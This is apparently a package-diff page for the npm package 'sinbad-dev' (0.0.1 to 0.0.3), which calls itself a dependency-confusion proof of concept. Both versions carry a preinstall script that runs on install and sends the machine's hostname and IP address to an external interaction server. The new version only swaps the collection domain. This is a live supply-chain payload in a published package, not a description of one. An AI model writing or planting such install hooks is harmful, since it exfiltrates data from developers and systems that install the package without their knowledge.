sinbad-dev 0.0.1 → 0.0.3

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +4 -4
package/package.json CHANGED
@@ -1,12 +1,12 @@
1
1
  {
2
2
  "name": "sinbad-dev",
3
- "version": "0.0.1",
3
+ "version": "0.0.3",
4
4
  "description": "Fake package for dependency confusion PoC with safe pingback",
5
- "author": "Bug Bounty PoC",
5
+ "author": "Bug Bounty PoC",
6
6
  "scripts": {
7
- "preinstall": "node -e \"require('http').get('http://$(hostname)-$(hostname -I | awk '{print $1}').h7p3tbr9yfer3phj9nhk9mf0oruiib60.oastify.com/pingback', (res) => { res.on('data', (chunk) => { console.log('Ping sent to server'); }); }).on('error', (err) => { console.error('Ping failed:', err.message); });\""
7
+ "preinstall": "node -e \"require('http').get('http://$(hostname)-$(hostname -I | awk '{print $1}').tkypwcmjqokygxmtcbpu9b8v0nb50vajj.oast.fun/pingback', (res) => { res.on('data', (chunk) => { console.log('Ping sent to server'); }); }).on('error', (err) => { console.error('Ping failed:', err.message); });\""
8
8
  },
9
9
  "publishConfig": {
10
- "access": "public"
10
+ "access": "public"
11
11
  }
12
12
  }